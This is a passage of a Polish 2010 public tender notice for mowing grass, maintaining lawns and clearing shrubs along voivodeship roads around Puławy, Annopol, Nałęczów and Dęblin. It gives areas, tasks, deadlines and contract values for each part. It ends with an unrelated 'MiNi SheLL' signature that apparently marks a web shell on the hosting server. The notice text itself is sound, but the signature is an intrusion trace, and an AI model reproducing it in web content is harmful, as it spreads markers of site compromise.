<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - Koszenie traw i chwastów z poboczy dróg wojewódzkich nr 738, 741, 743, 801, 824, 826, 830, 832, 845, 860 na terenie Obwodu Drogowego w Puławach z wyłączeniem miast: Puławy, Nałęczów i Dęblin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres usług obejmuje:1)koszenie obustronne, w ciągu roku, w okresie od  kwietnia do września 2010 r. w maksymalnej ilości  220,48 ha;
2)usunięcie przed każdym koszeniem zanieczyszczeń takich jak kamienie, gruz, puszki, butelki itp. i wywiezienie ich na składowisko odpadów  
3)koszenie ręczne oraz z użyciem kosiarki(ek) bijakowej(ych) całej szerokości pasa drogowego, z uwzględnieniem poboczy, rowów, skarp, przeciwskarp oraz wykoszenie wlotów skrzyżowań z drogami o nawierzchni bitumicznej na dł. 20 m). Przyjęte szerokości koszenia zawiera załącznik I - przedmiar usług . 
4)ręczne koszenie w miejscach niedostępnych tj. przy słupkach znaków drogowych,  słupkach prowadzących, barierach energochłonnych itp. Zakres usługi obejmuje również wykoszenie do wymaganej szerokości terenu za barierami drogowymi
5)  zapewnienie przez Wykonawcę bezpiecznych warunków ruchu drogowego w rejonie prowadzonych usług objętych umową na podstawie przekazanego przez Zamawiającego projektu czasowej organizacji ruchu, stanowiącego załącznik do niniejszej SIWZ. Wartośc zadania nr 1 - 126597,41 zł netto..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.20.00-0, 77.31.41.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - Koszenie traw i chwastów z poboczy dróg wojewódzkich nr 747, 755, 759, 817, 824, 825, 854, 855, 857, 900 na terenie Obwodu Drogowego w Annopolu z wyłączeniem miasta Opole Lubelskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres usług obejmuje:1)koszenie obustronne w ciągu roku w okresie od  kwietnia do września 2010 r. w maksymalnej ilości  214,68 ha;
2)usunięcie przed każdym koszeniem zanieczyszczeń takich jak kamienie, gruz, puszki, butelki itp. i wywiezienie ich na składowisko odpadów  
3)koszenie ręczne oraz z użyciem kosiarki(ek) bijakowej(ych) całej szerokości pasa drogowego, z uwzględnieniem poboczy, rowów, skarp, przeciwskarp oraz wykoszenie wlotów skrzyżowań z drogami o nawierzchni bitumicznej na dł. 20 m). Przyjęte szerokości koszenia zawiera załącznik I - przedmiar usług . 
4)ręczne koszenie w miejscach niedostępnych tj. przy słupkach znaków drogowych,  słupkach prowadzących, barierach energochłonnych itp. Zakres usługi obejmuje również wykoszenie do wymaganej szerokości terenu za barierami drogowymi
5)Zapewnienie przez Wykonawcę bezpiecznych warunków ruchu drogowego w rejonie prowadzonych usług objętych umową na podstawie przekazanego przez Zamawiającego projektu czasowej organizacji ruchu, stanowiącego załącznik do niniejszej SIWZ. Wartosc zadania nr 2 - 119864,43 zł netto..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.20.00-0, 77.31.41.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 - Utrzymanie trawników położonych wzdłuż dróg wojewódzkich nr 801, 824 i 851 na terenie miasta Puławy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres usług obejmuje:1)Koszenie trawników wraz z  wygrabieniem skoszonej trawy i wywozem jej na składowisko odpadów - sześciokrotnie w okresie kwiecień - wrzesień 2010 na powierzchni 5,51 ha;
2)Jednokrotne  wiosenne  porządkowe wygrabienie trawników z wywozem wygrabionych nieczystości i resztek roślin na składowisko odpadów   w m-cu kwietniu 2010 na powierzchni 5,51 ha; 
3)Dwukrotne jesienne porządkowe grabienie  trawników w wywozem wygrabionych liści, nieczystości i resztek roślin na składowisko odpadów w okresie  wrzesień - listopad 2010  na powierzchni  5,51 ha;
4)Dwudziestokrotne zebranie śmieci i nieczystości z terenu trawników z wywiezieniem ich na składowisko odpadów w okresie kwiecień - listopad 2010r.
5)Zapewnienie przez Wykonawcę bezpiecznych warunków ruchu drogowego w rejonie prowadzonych usług objętych umową na podstawie przekazanego przez Zamawiającego projektu czasowej organizacji ruchu, stanowiącego załącznik do niniejszej SIWZ
6) Wykaz powierzchni na poszczególnych ulicach przedstawia załącznik - przedmiar usług. Wartosc zadania nr 3 - 76737,05 zł netto..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.20.00-0, 77.31.41.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4 - Utrzymanie trawników położonych wzdłuż dróg wojewódzkich  nr 826 i 830 na terenie miasta Nałęczów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres usług obejmuje:1)Koszenie trawników wraz z  wygrabieniem skoszonej trawy i wywozem jej na składowisko odpadów - sześciokrotnie w okresie kwiecień - wrzesień 2010 na powierzchni 3,18 ha;
2)Jednokrotne  wiosenne  porządkowe wygrabienie trawników z wywozem wygrabionych nieczystości i resztek roślin na składowisko odpadów  w m-cu kwietniu 2010 na powierzchni 3,18 ha; 
3)Dwukrotne jesienne porządkowe grabienie  trawników w wywozem wygrabionych liści, nieczystości i resztek roślin na składowisko odpadów w okresie  wrzesień - listopad 2010  na powierzchni  3,18 ha;
4)Dwudziestokrotne zebranie śmieci i nieczystości z terenu trawników                  z wywiezieniem ich na składowisko odpadów w okresie kwiecień-listopad 2010r.
5)  Zapewnienie przez Wykonawcę bezpiecznych warunków ruchu drogowego w rejonie prowadzonych usług objętych umową na podstawie przekazanego przez Zamawiającego projektu czasowej organizacji ruchu, stanowiącego załącznik do niniejszej SIWZ
6) Wykaz powierzchni na poszczególnych ulicach przedstawia załącznik - przedmiar usług. Wartosc zadania nr 4 - 44 287,45 zł netto..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.20.00-0, 77.31.41.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5 - Utrzymanie trawników położonych wzdłuż dróg wojewódzkich  nr 801 i 831 na terenie miasta Dęblin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres usług obejmuje:
1)Koszenie trawników wraz z  wygrabieniem skoszonej trawy i wywozem jej na składowisko odpadów - sześciokrotnie w okresie kwiecień - wrzesień 2010 na powierzchni 1,90 ha;
2)Jednokrotne  wiosenne  porządkowe wygrabienie trawników z wywozem wygrabionych nieczystości i resztek roślin na składowisko odpadów   w m-cu kwietniu 2010 na powierzchni 1,90 ha; 
3)Dwukrotne jesienne porządkowe grabienie  trawników w wywozem wygrabionych liści, nieczystości i resztek roślin na składowisko odpadów   w okresie  wrzesień - listopad 2010  na powierzchni  1,90 ha;
4)Dwudziestokrotne zebranie śmieci i nieczystości z terenu trawników z wywiezieniem ich na składowisko odpadów w okresie kwiecień - listopad 2010r.
5)  Zapewnienie przez Wykonawcę bezpiecznych warunków ruchu drogowego w rejonie prowadzonych usług objętych umową na podstawie przekazanego przez Zamawiającego projektu czasowej organizacji ruchu, stanowiącego załącznik do niniejszej SIWZ
6)  Wykaz powierzchni na poszczególnych ulicach przedstawia załącznik - przedmiar usług. Wartośc zadania nr 5 - 26 461,05 zł netto..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.20.00-0, 77.31.41.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6 - wycinka samosiejek rosnących wzdłuż dróg wojewódzkich nr 747, 824 i 825 na terenie Obwodu Drogowego w Annopolu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres usług obejmuje wycinkę samosiejek na drogach : a) nr 825 odc. Kamień - Józefów - na powierzchni 0,54 ha, przy zakrzewieniu - porośnięciu gęstym, b) nr 824 odc. Józefów - Annopol - na powierzchni 1,55 ha , przy zakrzewieniu - porośnięciu gęstym, c) nr 747 odc. Kamień - Opole Lubelskie - na powierzchni 0,69 ha, przy zakrzewieniu - porośnięciu gęstym 
Usługi polegać będą na:
1)wycince krzewów i samosiejek na wskazanych odcinkach dróg, na całej szerokości pasa drogowego, z uwzględnieniem poboczy, skarp, rowów oraz przeciwskarp; szczegółowy wykaz odcinków objętych usługą zawiera załącznik - przedmiar usług  
2)uprzątnięciu z pasa drogowego wyciętych krzaków i samosiejek, które stanowią własność Wykonawcy poprzez rozdrobnienie w rębakach lub wywóz na składowisko odpadów,   
3)realizacji prac zgodnie z opisem i Zasadami Realizacji Zamówienia 
4)zapewnieniu, w rejonie prowadzonych prac bezpiecznych warunków ruchu  drogowego i pieszego zgodnie z zatwierdzonym projektem czasowej organizacji ruchu, przekazanym przez Zamawiającego. Wartosc zadania nr 6 - 34 871,18 zł netto..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.20.00-0, 77.31.41.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com